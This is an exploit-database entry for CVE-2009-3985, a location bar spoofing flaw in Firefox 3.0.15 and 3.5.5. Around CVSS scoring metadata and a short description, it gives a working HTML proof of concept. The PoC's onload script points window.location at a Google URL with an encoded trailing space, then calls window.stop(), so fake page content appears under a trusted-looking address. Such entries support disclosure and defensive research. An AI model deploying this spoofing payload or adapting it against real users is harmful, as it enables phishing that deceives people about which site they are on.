Lucene search

K
exploitpackJordi ChancelEXPLOITPACK:8ED19A544263986AFD75DCC9DE252055
HistoryDec 18, 2009 - 12:00 a.m.

Mozilla Firefox - Location Bar Spoofing

2009-12-1800:00:00
Jordi Chancel
6

6.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

Mozilla Firefox - Location Bar Spoofing

# Exploit Title: MOZILLA FIREFOX LOCATION BAR SPOOFING VULNERABILITY
# Date: 2009-12-18
# Author: Jordi Chancel
# Software Link: http://www.mozilla.org/security/announce/2009/mfsa2009-69.html
# Version: Mozilla Firefox 3.0.15 & 3.5.5
# Tested on: Windows XP-VISTA-SEVEN & LINUX BACKTRACK
# CVE : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3985
# DESCRIPTION: {
#		Security researcher Jordi Chancel reported an issue similar to one fixed in mfsa2009-44
#		in which a web page can set document.location to a URL that can't be displayed properly and then inject 
#		content into the resulting blank page. An attacker could use this vulnerability to place a legitimate-looking 
#		but invalid URL in the location bar and inject HTML and JavaScript into the body of the 
#		page, resulting in a spoofing attack.  }
# Code :
<html>
<title>FAKE PAGE</title>
<body onload="javascript:window.location = 'https://www.google.com%20';window.stop();void(0);">
<h1>FAKE PAGE</h1>
</body>
</html>

6.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P